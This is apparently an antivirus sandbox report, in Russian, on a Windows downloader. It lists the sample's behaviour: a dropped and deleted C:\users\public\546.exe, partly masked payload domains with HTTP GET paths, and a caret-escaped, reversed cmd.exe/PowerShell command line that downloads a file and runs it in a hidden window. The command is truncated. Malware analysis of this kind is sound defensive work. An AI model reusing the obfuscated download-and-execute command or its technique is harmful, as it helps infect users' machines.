Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"^se^t 8^J^Z^j= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac};k^a^er^b;hi^b$^ ^met^I-^ekovn^I^;)h^ib^$^ ,r^T^S^$(e^l^i^F^d^ao^ln^w^oD.Zjb$^{^yrt^{)V^H^b^$ n^i^ rT^S^$(hc^aer^o^f;'^exe.'^+^ErH^$+'...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\546.exe
Удаляет следующие файлы
- C:\users\public\546.exe
Сетевая активность
Подключается к
- 'th####konionusa.com':80
- 'jp##a.org':80
- 'jp##a.org':443
- 'la##ka.org':80
- 'la##ka.org':443
- 'it####namirim.org':80
- 'h3#####ologia.com.br':80
TCP
Запросы HTTP GET
- http://th####konionusa.com/G54zZtja
- http://jp##a.org/pxwI8xUoc
- http://la##ka.org/Kah4FYb
- http://it####namirim.org/0TdhftvaPS
- http://h3#####ologia.com.br/KCr6BPkO
Другие
- 'jp##a.org':443
- 'la##ka.org':443
UDP
- DNS ASK th####konionusa.com
- DNS ASK jp##a.org
- DNS ASK la##ka.org
- DNS ASK it####namirim.org
- DNS ASK h3#####ologia.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"^se^t 8^J^Z^j= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac};k^a^er^b;hi^b$^ ^met^I-^ekovn^I^;)h^ib^$^ ,r^T^S^$(e^l^i^F^d^ao^ln^w^oD.Zjb$^{^yrt^{)V^H^b^$ n^i^ rT^S^$(hc^aer^o^f;'^exe.'^+^ErH^$+'...' (со скрытым окном)
